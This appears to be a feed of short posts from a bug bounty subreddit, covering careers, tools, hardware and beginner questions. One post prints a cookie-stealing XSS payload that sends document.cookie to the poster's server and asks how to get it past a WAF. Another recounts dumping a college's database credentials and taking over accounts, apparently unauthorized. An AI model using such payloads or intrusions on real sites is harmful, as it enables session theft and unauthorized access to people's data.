How could bug hunting benefit me?
I want to be clear that my primary goal is to make money, which I believe is what most of us work for in the first place.
I'm not fully certain yet about the exact path I want to pursue, but bug hunting and penetration testing caught my attention, so I created a roadmap that includes:
Networking basics
Database fundamentals
The CISSP All-in-One Exam Guide (which has been the most valuable and time-consuming so far)
I've completed about 70% of this plan. However, I'm still feeling a bit uncertain about the direction I'm heading, as I'm mostly studying general security concepts at this point.
I’m seeking advice on whether I should focus more on penetration testing and bug bounty hunting. There are mixed opinions—some say it's nearly impossible to find work or discover bugs, while others believe there are opportunities, especially with the evolving landscape of technology, quantum computing, and AI, which could drastically impact security.
Would dedicating my time to learning more about bug bounty hunting and penetration testing be financially rewarding, or would I be wasting my time? Even if I don't earn money, would the skills I gain be valuable, or should I consider other paths for better returns on my time?
https://redd.it/1fnsepu
@r_bugbounty
subdomain gets redirected to a totally different website
I found this subdomain that redirects me to a totally different website. Example: subdomain.domain.com gives me bettingsite.com
I am just curious about this behavior, does this mean they have been hacked?
Is this worth reporting?
I took a quick look at the response and I found this JavaScript code that is possibly the culprit.
</script>
<script type='text/javascript' language='JavaScript'>
window.onload = function() {
if(clickTracking && typeof track_onclick == 'function') track_onclick("trackingcode");
top.location.href = "http://bettingsite.com";
};
</script>
https://redd.it/1fnmkbi
@r_bugbounty
Would you exploit it further?
If you find an SQL injection, would you try to exploit it further (by exfiltrating all tables, for example) to demonstrate impact, or just be satisfied with reporting a simple PoC that demonstrates it's there?
https://redd.it/1fn3n0o
@r_bugbounty
Need help with really strange behavior on IBM DataPower.
https://redd.it/1fmycu6
@r_bugbounty
Newbie question: How do I start finding bug bounty programs for beginners (low-hanging fruit)?
I have completed CTFs on HackerOne and have been practicing on PortSwigger Labs. I'm eager to work on real-world websites and start hunting bugs. How can I find beginner-friendly bug bounty programs?
https://redd.it/1fmr3bd
@r_bugbounty
New free tool for subdomain enumeration and reverse DNS search
Hey! I just found a new tool for recon https://search.reconwave.com/about
Apparently also including reverse NS and TXT search in higher plans
https://redd.it/1fmbgnf
@r_bugbounty
Is it useless to test XSS on these frameworks?
Is it true that if we find a web application in bug bounty that is built with frameworks such as React, Vue, Angular, and Ember.js, we don't need to test for XSS? I once read an article that said that testing for XSS there would be useless because we'll never find XSS there; if we do, it will be very rare. Is that true?
https://redd.it/1fly9bn
@r_bugbounty
Fedora vs Mac OS which performs better?
I'm trying to look in detail at which OS nowadays will fit better and also run BBH tools more smoothly.
Having in mind that both OSes will have tools installed locally on them.
And also, Fedora will be installed as the main OS. Does it break normally?
Side question: which Fedora spin/version is really the one for cyber sec? Is Workstation the standard for it?
Thanks for the replies!
https://redd.it/1flufwb
@r_bugbounty
Email Spam Attack
I potentially found my first reportable bug! I wanted a little bit of advice on writing a report.
I discovered a bug that allows me to send hundreds of emails to any email of my choosing, and it only requires one HTTP request. It seems like exploiting this is a good way to get blocked by spam. Theoretically, I could automate something to do this multiple times, and get the website blocked on a given email service. I plan to be more thorough in my report, but am I missing any key details on how else this could be disruptive for the website? Is it worth writing up the report for this?
https://redd.it/1flrspp
@r_bugbounty
I Hacked my college database!
So long story short, I graduated in 2021 from that particular college. Today I decided to just mess around their website and wanted to see what I could find. 1 hour into searching, I came across a login portal which was designed for teachers to request a leave, which later had to be approved by the HOD.
So without going into detail, I managed to dump the database backend source code. This was probably due to improper permissions.
One of the files had the database creds, which gave me access to all their data, which includes emails, phone numbers, reason for their leave and all the user passwords.
I could later take over any account in the portal. I decided to report this to my professor who was the CS HOD at the time.
I was really excited, and she tells me it’s a student project on a trial basis which they are improving and she will look into it. She also asked me to test their other servers.
This decreased my excitement a little. What do you guys think, was it a good find?
https://redd.it/1fli7bn
@r_bugbounty
JavaScripts
How do you guys analyze JS code files?
What do you look for in these files?
https://redd.it/1flfdzi
@r_bugbounty
What's wrong with amass?
Whenever I try to find subdomains using amass, it shows unwanted results. Any solution?
https://preview.redd.it/d9mxhslxfwpd1.png?width=1600&format=png&auto=webp&s=2eac346f4ba67b082a81f650c309eccae2f19ec7
https://redd.it/1fl4oek
@r_bugbounty
Seeking advice
Hello guys, can you please help: which is better, doing bug hunting full-time or working in a pentest job for $400/month?
I'm from a 3rd world country.
https://redd.it/1fkyg8e
@r_bugbounty
Learning Web Frameworks for bug bounty
I want to learn a web development framework before jumping into bug bounty hunting. Which do you guys recommend? Node.js or .NET Core?
https://redd.it/1fkwu2h
@r_bugbounty
Is bug bounty a scam?
What do you think about the bug bounty programs that try to scam you, and is there an approach I can follow to avoid being scammed?
https://redd.it/1fku0sh
@r_bugbounty
1st ever bug turned out to be Duplicate
Soo, guys, I reported a bug at hacker1, my 1st ever bug, & after many months/years of learning, I thought this is it... I have done it, but no, after a week, today I got their reply that it's a duplicate... I am sad ig that it turned out to be a duplicate. Some of you might have had the same experience in the past; what did you tell yourself & then how did your life turn out to be?
https://redd.it/1fnn7ne
@r_bugbounty
Best and straight to the point bbh roadmap?
If you experienced BBHs had to do it all over again, but with a straight-to-the-point roadmap, in a way that you'd learn the essentials to start trying, looking and learning by practicing, which courses/skills/tools would you put on the roadmap as the minimum required to start the BBH journey?
I'm asking having in mind that cyber sec is a huge field with a lot of skills needed for many things, but for this instance, centered on BBH, so people won't be overloaded with things that they can maybe learn later or along the way.
Thanks
https://redd.it/1fn9nu2
@r_bugbounty
What does this mean?
A program I hunt on has this sentence in out of scope: Account squatting by preventing users from registering with certain email addresses.
What does he mean by it?
I tried to translate it but I didn't get it. Could someone explain it, please?
https://redd.it/1fmvx5g
@r_bugbounty
How to bug bounty (pls reply)
Hey hackers,
I'm a noobie who started learning web penetration testing.
How can I be a master of web hacking?
I wanna explore bug bounty programs but I still feel idk much yet.
Tho I have solved like so many topics on PortSwigger, that's only in a controlled environment. Also I have Hacker on Hack The Box.
What should I do next?
https://redd.it/1fmwoir
@r_bugbounty
Newbie Question: Is this reflected XSS in a cookie enough to prove impact?
https://redd.it/1fme7ke
@r_bugbounty
Cohackers
Does anyone know about the CoHackers website? I haven't found anyone talking about it—no YouTube videos, no Reddit subs, nothing. I'm curious about this.
Link - https://cohackers.co/
https://redd.it/1fm3h85
@r_bugbounty
XSS doubt
So I executed this command on the console of the website
document.body.innerHTML = "<iframe src='https://my-server.app/log?c=" + document.cookie + "'></iframe>";
and was able to get the cookie on my server.
What do I do from here on? I have tried pasting the payload into the url, but the WAF locks me out every single time. Do I look for input fields to execute this payload on? Are there other ways to take advantage of this? Sorry if dumb question, I'm new.
https://redd.it/1flvlm1
@r_bugbounty
Using YouTube to steal your files
https://lyra.horse/blog/2024/09/using-youtube-to-steal-your-files/
https://redd.it/1flthpf
@r_bugbounty
Pentest Jobs vs BBH nowadays
Can anyone share their professional experience and advice on both sides, or maybe someone who switched from one to the other, or even someone who entered cybersec just for BBH and made a full-time job out of it?
Thanks for all replies!
https://redd.it/1flk5oj
@r_bugbounty
False Positive?
Hi everyone... Can someone help to find a false positive on OWASP Juice Shop?
Thank you, really appreciate it.
https://redd.it/1flfyi4
@r_bugbounty
I would like to become a bug bounty hunter…where do I start?
Hello everyone
I am very interested in becoming a bug bounty hunter and would like to know where I should start? Currently I am studying HTB CTPS and afterwards I plan on studying their CBBH course. I have signed myself up on H1 and would like to know what I should do as a beginner.
I am aware of in scope (allowed) and out of scope (not allowed) but that is all I know about what scopes are or is there something more I should know? I would like to know what tools would I need to have installed on my kali linux vm to make bug bounty hunting easier? Are there any good free tools or any good community tools via github? Or am I being too eager?
I would like to dive into bug bounty hunting as a way to become more experienced and to build up skills and be able to earn some money.
Any advice is greatly appreciated and I thank you in advance for your kindness.
https://redd.it/1fl8cxf
@r_bugbounty
Running BURPSUITE on MAC OS
Hi, I'm looking to know how RAM-demanding Burp Suite could be. I'm planning to get a MacBook Air M1 with 8 RAM. I've read that it could take from 1GB to even 12 RAM? Or is it just about not overusing extensions and overloading work?
https://redd.it/1fkx85b
@r_bugbounty
Has anyone ever gotten a payout directly from the company?
I've heard a few stories about companies not paying out and it has me a bit concerned. They basically tell you it's not a bug it's a feature then patch the issue.
https://redd.it/1fkxrwi
@r_bugbounty
Hi! I got a question on using a MACBOOK AIR M1 FOR BBH
Hi, I'm sorry to bother with this question, but I need to know if a MACBOOK AIR M1/8RAM/256SSD would be enough to run only BBH tools such as Burp and the other essentials/must-haves, installed directly on the MacBook.
Would 8 RAM be enough for the workflow?
I don't want to VM Kali or something like that locally, nor cloud-based, nor a Linux cloud environment.
https://redd.it/1fku6c6
@r_bugbounty
Are you guys hunting on android apps? If yes, what kind of vulnerabilities can be reported?
I have been focusing on native Android apps, mainly reporting issues found through source code analysis, such as data exfiltration via exported activities and broadcasts. Dynamic analysis is becoming more challenging, as reporting the clear transmission of confidential data (e.g., access tokens) in Logcat is often out of scope. Most submissions requiring an app installation are classified as medium or low severity, especially on platforms like Intigriti and Bugcrowd. Even account takeover vulnerabilities by bypassing Android disambiguation are rated with a severity of 3.6 or below 5.0.
If anyone can share tips on attack surfaces in Android apps, it would be really helpful. The biggest struggle these days is educating triagers. Most of the time, they rate bugs with lower severity on Intigriti and Bugcrowd, although jack_bugcrowd seems to have some knowledge in Android pentesting.
Since the beginning of this year, I've earned around $10,000 from Android app bug bounties, with most vulnerabilities related to data exfiltration via exported activities and hardcoded secrets. Are there any other vulnerabilities I should focus on in both static and dynamic analysis? I need guidance to continue in the right direction. Thanks for reading my post!
https://redd.it/1fkr5kp
@r_bugbounty